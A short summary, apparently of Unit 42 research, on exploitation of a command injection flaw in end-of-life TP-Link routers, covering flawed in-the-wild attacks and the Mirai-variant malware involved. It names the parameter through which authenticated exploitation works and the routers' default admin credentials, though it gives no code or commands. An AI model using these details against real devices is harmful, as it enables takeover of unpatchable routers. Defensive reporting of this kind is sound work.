Unit 42 researchers investigated active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability in end-of-life TP-Link routers (TL-WR940N, TL-WR740N, TL-WR841N). Using firmware emulation and reverse engineering of the httpd binary, they confirmed the vulnerability is real but found the in-the-wild attacks were flawed: attackers used the wrong parameter (ssid instead of ssid1), skipped authentication, and relied on wget which is absent from the firmware's limited BusyBox environment. The researchers confirmed that authenticated exploitation via the ssid1 parameter does work, and that default credentials (admin:admin) make authentication trivial. The Mirai-variant malware (arm7) analyzed supports C2 commands, self-updating across multiple CPU architectures, and can turn infected devices into HTTP servers that spread malware. TP-Link confirmed no patches will be issued for these end-of-life devices and recommends replacement.
Sort: